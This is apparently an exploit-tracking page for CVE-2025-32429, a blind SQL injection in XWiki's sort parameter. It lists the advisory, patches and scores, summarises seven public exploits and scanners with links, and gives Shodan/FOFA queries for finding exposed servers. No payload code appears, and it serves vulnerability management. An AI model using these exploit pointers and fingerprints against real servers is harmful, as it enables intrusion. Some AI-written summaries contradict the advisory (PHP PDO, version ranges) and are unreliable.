CVE-2025-32429

CRITICAL EXPLOITED NUCLEI

XWiki Platform - SQL Injection

Title source: nuclei

Exploitation Summary

CVE-2025-32429 has been observed exploited in the wild (reported by VulnCheck KEV). EIP tracks 7 public exploits from researchers including Byte Reaper, byteReaper77, cybersecplayground. A Nuclei detection template is also available.

AI-analyzed exploit summary This is a C-based exploit for CVE-2025-32429, targeting a blind SQL injection vulnerability in XWiki Platform's `getdeleteddocuments.vm` template via the `sort` parameter. The PoC sends crafted payloads to the REST endpoint and measures response delays to confirm successful injection.

Description

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2, it's possible for anyone to inject SQL using the parameter sort of the getdeleteddocuments.vm. It's injected as is as an ORDER BY value. This is fixed in versions 16.10.6 and 17.3.0-rc-1.

Exploits (7)

exploitdb WORKING POC

by Byte Reaper · cwebappsmultiple

https://www.exploit-db.com/exploits/52384

View Code ZIP pw:eip

This is a C-based exploit for CVE-2025-32429, targeting a blind SQL injection vulnerability in XWiki Platform's `getdeleteddocuments.vm` template via the `sort` parameter. The PoC sends crafted payloads to the REST endpoint and measures response delays to confirm successful injection.

Classification

Working Poc 95%

Attack Type

Sqli

Complexity

Moderate

Reliability

Reliable

Target: XWiki Platform ≤ 14.x

No auth needed

Prerequisites: Access to the target XWiki instance · Network connectivity to the REST endpoint

MITRE ATT&CK

T1189 - Drive-by Compromise T1505 - Server Software Component

devstral-2 · analyzed Feb 16, 2026 Full analysis →

nomisec WORKING POC 10 stars

by byteReaper77 · infoleak

https://github.com/byteReaper77/CVE-2025-32429

View Code ZIP pw:eip

This repository contains a C-based Proof-of-Concept for CVE-2025-32429, a blind SQL injection vulnerability in XWiki's LiveData REST API. The exploit detects WAF interference and iterates through SQLi payloads to measure response times and search for indicative keywords.

Classification

Working Poc 95%

Attack Type

Sqli

Complexity

Moderate

Reliability

Reliable

Target: XWiki Platform (version not specified)

No auth needed

Prerequisites: Linux x86_64 · GCC · libcurl development headers · argparse C library

MITRE ATT&CK

T1189 - Drive-by Compromise T1190 - Exploit Public-Facing Application

devstral-2 · analyzed Feb 16, 2026 Full analysis →

github WRITEUP 7 stars

by cybersecplayground · poc

https://github.com/cybersecplayground/PoC-and-CVE-Reports/tree/main/2025/CVE-2025-32429.md

View Code ZIP pw:eip

The repository contains detailed technical writeups for multiple CVEs, including CVE-2025-32429, with in-depth analysis, proof-of-concept examples, and mitigation strategies. Each writeup includes vulnerability descriptions, affected endpoints, and exploitation techniques.

Classification

Writeup 95%

Attack Type

Other

Complexity

Moderate

Reliability

Reliable

Target: Various (e.g., account_mgr.cgi, Ivanti Connect Secure, Zabbix, Check Point VPN, Bricks Builder)

No auth needed

Prerequisites: Access to vulnerable endpoints · Basic understanding of HTTP requests and payloads

MITRE ATT&CK

T1190 - Exploit Public-Facing Application

devstral-2 · analyzed Feb 27, 2026 Full analysis →

nomisec WORKING POC

by TheNaderr · poc

https://github.com/TheNaderr/CVE-2025-32429

View Code ZIP pw:eip

This repository contains a functional exploit for CVE-2025-32429, targeting SQL injection in PHP PDO prepared statements when emulation is enabled. The exploit uses various SQL injection payloads to test and exploit the vulnerability in the XWiki platform via the 'sort' parameter in getdeleteddocuments.vm.

Classification

Working Poc 90%

Attack Type

Sqli

Complexity

Moderate

Reliability

Reliable

Target: XWiki platform (specific version not specified)

No auth needed

Prerequisites: Target system with vulnerable XWiki platform · Network access to the target

MITRE ATT&CK

T1190 - Exploit Public-Facing Application T1059 - Command and Scripting Interpreter

devstral-2 · analyzed Apr 13, 2026 Full analysis →

nomisec SCANNER

by imbas007 · poc

https://github.com/imbas007/CVE-2025-32429-Checker

View Code ZIP pw:eip

This repository contains a Python-based vulnerability scanner for detecting CVE-2025-32429, an SQL injection vulnerability in XWiki platforms. The scanner includes features for single and bulk target scanning, WAF detection, and both time-based and error-based SQL injection detection.

Classification

Scanner 95%

Attack Type

Sqli

Complexity

Moderate

Reliability

Reliable

Target: XWiki

No auth needed

Prerequisites: Network access to the target XWiki instance

MITRE ATT&CK

T1189 - Drive-by Compromise T1190 - Exploit Public-Facing Application

devstral-2 · analyzed Feb 16, 2026 Full analysis →

nomisec WORKING POC

by amir-othman · infoleak

https://github.com/amir-othman/CVE-2025-32429

View Code ZIP pw:eip

This repository contains a proof-of-concept exploit for CVE-2025-32429, which targets a SQL injection vulnerability in PHP PDO prepared statements when emulation is enabled. The exploit uses various SQL injection payloads to test for vulnerability in the XWiki platform.

Classification

Working Poc 90%

Attack Type

Sqli

Complexity

Moderate

Reliability

Reliable

Target: XWiki platform

No auth needed

Prerequisites: Target system with vulnerable PHP PDO prepared statements · Network access to the target system

MITRE ATT&CK

T1189 - Drive-by Compromise T1190 - Exploit Public-Facing Application

devstral-2 · analyzed Feb 16, 2026 Full analysis →

vulncheck_xdb SCANNER

infoleak

https://github.com/imbas007/CVE-2025-32429-Checker-

View Code ZIP pw:eip

This repository contains a Python-based vulnerability scanner for detecting CVE-2025-32429, an SQL injection vulnerability in XWiki platforms. The tool includes features for single and bulk target scanning, WAF detection, and both time-based and error-based SQL injection detection.

Classification

Scanner 95%

Attack Type

Sqli

Complexity

Moderate

Reliability

Reliable

Target: XWiki

No auth needed

Prerequisites: Target URL or list of URLs

MITRE ATT&CK

T1190 - Exploit Public-Facing Application T1059 - Command and Scripting Interpreter

devstral-2 · analyzed Feb 25, 2026 Full analysis →

Nuclei Templates (1)

XWiki Platform - SQL Injection

CRITICALVERIFIEDby ritikchaddha

Shodan: html:"data-xwiki-reference"

FOFA: body="data-xwiki-reference"

References (4)

Core 4

Core References

Vendor Advisory x_refsource_confirm

https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-vr59-gm53-v7cq

Patch x_refsource_misc

https://github.com/xwiki/xwiki-platform/commit/dfd0744e9c18d24ac66a0d261dc6cafd1c209101

View Patch ZIP pw:eip

Patch x_refsource_misc

https://github.com/xwiki/xwiki-platform/commit/f502b5d5fd36284a50890ad26d168b7d8dc80bd3

View Patch ZIP pw:eip

Issue Tracking, Vendor Advisory x_refsource_misc

https://jira.xwiki.org/browse/XWIKI-23093

Scores

CVSS v3 9.8

EPSS 0.3491

EPSS Percentile 97.1%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment

Exploitation none

Automatable yes

Technical Impact total

Details

VulnCheck KEV 2025-11-03

CWE

CWE-89

Status published

Products (2)

org.xwiki.platform/xwiki-platform-distribution-war 9.4-rc-1 - 16.10.6Maven

xwiki/xwiki 9.4 - 16.10.6

Published Jul 24, 2025

Tracked Since Feb 18, 2026